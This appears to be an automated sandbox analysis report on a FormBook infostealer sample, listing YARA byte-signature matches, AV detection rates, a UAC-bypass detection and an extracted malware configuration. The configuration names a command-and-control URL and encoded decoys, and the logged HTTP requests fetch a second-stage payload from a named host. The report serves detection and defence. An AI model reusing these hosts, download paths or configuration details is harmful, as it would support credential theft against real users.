5.0.cmd.exe.50410000.3.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5831:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c9f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15d87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.0.cmd.exe.50410000.3.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x15b85:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15631:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15c87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15dff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x973a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1487c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa482:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b637:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c75a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.cmd.exe.50410000.3.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18089:$sqlite3step: 68 34 1C 7B E1 0x181bc:$sqlite3step: 68 34 1C 7B E1 0x180cb:$sqlite3text: 68 38 2A 90 C5 0x18213:$sqlite3text: 68 38 2A 90 C5 0x180e2:$sqlite3blob: 68 53 D8 7F 8C 0x18235:$sqlite3blob: 68 53 D8 7F 8C
5.0.cmd.exe.50410000.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.cmd.exe.50410000.3.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6631:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa96f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16b87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.0.cmd.exe.50410000.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16985:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16a87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16bff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa53a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1567c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb282:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c437:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.cmd.exe.50410000.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e89:$sqlite3step: 68 34 1C 7B E1 0x18fbc:$sqlite3step: 68 34 1C 7B E1 0x18ecb:$sqlite3text: 68 38 2A 90 C5 0x19013:$sqlite3text: 68 38 2A 90 C5 0x18ee2:$sqlite3blob: 68 53 D8 7F 8C 0x19035:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 37 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 1a#U00bb.exe	Virustotal: Detection: 32%			Perma Link
Source: 1a#U00bb.exe	ReversingLabs: Detection: 34%

Yara detected FormBook

Source: Yara match	File source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.299959844.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.479329024.0000000003210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.460422107.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.381193910.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.309895318.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.537026751.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.380920246.0000000003AD9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.488703408.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.301342863.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.479803163.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.300799185.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.433242777.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.300389282.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.333596734.0000000003C01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.537830907.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.308846513.0000000003A5C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.532023661.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Djfypqyfx.exe

ReversingLabs: Detection: 34%

Machine Learning detection for sample

Source: 1a#U00bb.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\Djfypqyfx.exe

Joe Sandbox ML: detected

Source: 5.2.cmd.exe.50410000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.cmd.exe.50410000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.cmd.exe.50410000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.1a#U00bb.exe.2637778.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.cmd.exe.50410000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.cmd.exe.50410000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: 00000005.00000000.299959844.0000000050410000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.bradwareham.com/2dou/"], "decoy": ["/OEd9KnwK/iP", "zlyDQht5zbJFuAXSIdTUjw==", "kDYUq8UfDwCluA34CDyS", "7HZOV1qT4rFI5mpJrcnoWVc=", "nnBRxMHdw4wosAXSIdTUjw==", "sdQ/2s4XC8g0MFFBBEfViR1V", "oHDnk6LHnHUHiwsLn33GBcm+egCb", "yV2U0Zf13bN3D3x7Df9++fDhF7CILTul", "cUbD5d4TmWcGB+BgyA==", "Kky9XlCLiTQfNUk1/zQ=", "ejVhmGLOqY9fiNPrefZMfFM=", "lVvGdVA2G/K9r8Bdwg==", "Gj+ogjaA9c92ElYsqMnoWVc=", "9yiEqVFDpWT9JJ/cfNrPhw==", "j2DBby8l6rlNV1HhxqOa", "jJoCUeXDOwrETLssvPAFS1E=", "kTJX5Y2Uj2U13OlkcUguJN+eCqGILTul", "VQTbC33cwRTrePw=", "JhV0w4/tyLmFrur+5EHViR1V", "DyZj5vhGPxKtdLzixvlTWFHQU6hIAk2mWw==", "12U9E8X0E92F", "z5HQwa7lRi2/OI74c0aF", "bQsb5a29o3paQIHN6jQ=", "y5HYxYiVCAC5r8Bdwg==", "269NSBh1VCMCSeM=", "1nZZpmfNICP+pNv7WzY=", "bfkgXcI2E9GSQfb4CDyS", "GvZX5N4sGwu0tO8hAd65bfvI++iOb++t", "ESeLNUJmP7mFCVoMjPDFgDUpX+Y=", "VW3K5bgQ55UsXLXxs4aSyIi2I6SILTul", "w2ZJUGKeHeOB3x+d3w==", "Rl261Z+P5r1cXuL4CDyS", "iaoLqarFoIIPihgj/UTViR1V", "UfPoA+jvYE8i5PVr0oZz+3zDvu4=", "sEl4u1N7SiHI/oX5Yt8TVF2Rww==", "ihtTSoHvvRTrePw=", "SGa6AsX0E92F", "PtcQ3Y7RNg2wYOPselSgH7JSxncv8d0=", "5P9njGFf3aqSfNL9", "9I3Q/7YN8L1PYW8/qcnoWVc=", "mSlfnm7TqHUal+BXwQ==", "epsPWRx9lkIdSFxEED0=", "iLEhS0xp2aqSfNL9", "DrWkgDQmekHh72bApvZfh2Jxblk9/dU=", "myf+DvRILfrJbZfPXjw=", "dwHgvnjUtHMGi/Wr+SYM/o/9xg==", "z5mGlY+9EfKVFF79IdTUjw==", "02GPzaC8PxK683jjNoJ4eP3WASbMfw==", "cpz/Rh+BVC8Lywr4CDyS", "eh8D+QYnhE78OsL4c0aF", "fJvt8/Unr2kCJmilinFMOsIz3w==", "eiX8Y0x8Xyra/AUHl3PB/9G9X9NbYA==", "hzVzNdD6iSG0WJfPXjw=", "3XFOI99VVy3vkADSRnZLA8gjowStdw==", "gUuIy3iTa0PVWZfPXjw=", "u09/Bvc/PhPekNv7WzY=", "lzUY+MImAbtHXai84L2zq7xd", "tEh3sX3hyk0wbMr14ETViR1V", "q0k0lVzZVUXxnhwO7leqpagfowStdw==", "x+lIFdjd5smUWZ3pzQdimF8=", "fh9Sg0CljRTrePw=", "oHIeFMb0E92F", "23utFO8RLgGlvA34CDyS", "/hl0LfDlqXALM3vFqOZCPM2+egCb"]}

Exploits

Yara detected UAC Bypass using ComputerDefaults

Source: Yara match	File source: 0.2.1a#U00bb.exe.2637778.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1a#U00bb.exe.2637778.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.303458989.0000000002268000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.303584675.00000000025FD000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.379536299.00000000022D8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.319230317.00000000023A8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1a#U00bb.exe PID: 6128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Djfypqyfx.exe PID: 5068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Djfypqyfx.exe PID: 5460, type: MEMORYSTR

Source: 1a#U00bb.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown

HTTPS traffic detected: 109.234.162.66:443 -> 192.168.2.3:49738 version: TLS 1.2

Source:	Binary string: wscript.pdbGCTL source: cmd.exe, 00000005.00000002.488066235.0000000005380000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: cmd.exe, 00000005.00000003.305572932.0000000003502000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.301795534.0000000003371000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000001E.00000002.543274704.000000000513F000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000001E.00000003.475337207.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000001E.00000002.539671067.0000000005020000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000001E.00000003.480850026.0000000004E88000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: cmd.exe, cmd.exe, 00000005.00000003.305572932.0000000003502000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.301795534.0000000003371000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000001E.00000002.543274704.000000000513F000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000001E.00000003.475337207.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000001E.00000002.539671067.0000000005020000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000001E.00000003.480850026.0000000004E88000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wscript.pdb source: cmd.exe, 00000005.00000002.488066235.0000000005380000.00000040.10000000.00040000.00000000.sdmp

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.bradwareham.com/2dou/

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: 1a#U00bb.exe, 00000000.00000003.260419711.0000000000581000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000014.00000000.398232671.000000000DDE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.433438029.000000000DDE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.460718387.000000000DDE3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft.co0
Source: wscript.exe, 0000001E.00000002.546799518.00000000056A6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.admiral-juegos.com/?fp=kkRBX1Mn5VLBDZ2cLYLxqMJfDhR5T9gHAiN23tab35viuN5iJaTX3x0tDUZhqU%2Fe
Source: 1a#U00bb.exe, 00000000.00000003.261044820.00000000005A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resimarmo.com/
Source: Djfypqyfx.exe, 0000000F.00000002.380461413.000000000349E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://resimarmo.com/yakdatafilesloadsonedrivedocumentsuploadgoogledownload/Djfypqyfxwyivtfoakxovbb

Source: unknown

DNS traffic detected: queries for: resimarmo.com

Source: global traffic	HTTP traffic detected: GET /yakdatafilesloadsonedrivedocumentsuploadgoogledownload/Djfypqyfxwyivtfoakxovbbaompeayl HTTP/1.1User-Agent: lValiHost: resimarmo.com
Source: global traffic	HTTP traffic detected: GET /yakdatafilesloadsonedrivedocumentsuploadgoogledownload/Djfypqyfxwyivtfoakxovbbaompeayl HTTP/1.1User-Agent: 7@Host: resimarmo.com

Source: unknown

HTTPS traffic detected: 109.234.162.66:443 -> 192.168.2.3:49738 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.299959844.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.479329024.0000000003210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.460422107.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.381193910.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.309895318.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.537026751.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.380920246.0000000003AD9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.488703408.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.301342863.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.479803163.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.300799185.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.433242777.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.300389282.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.333596734.0000000003C01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.537830907.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.308846513.0000000003A5C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.532023661.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.299959844.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000000.299959844.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.299959844.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.479329024.0000000003210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.479329024.0000000003210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.479329024.0000000003210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000000.460422107.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000000.460422107.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000000.460422107.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.381193910.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.381193910.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.381193910.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.309895318.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.309895318.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.309895318.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001E.00000002.537026751.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001E.00000002.537026751.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001E.00000002.537026751.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.380920246.0000000003AD9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.380920246.0000000003AD9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.380920246.0000000003AD9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.488703408.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.488703408.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.488703408.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.301342863.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000000.301342863.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.301342863.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.479803163.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.479803163.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.479803163.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
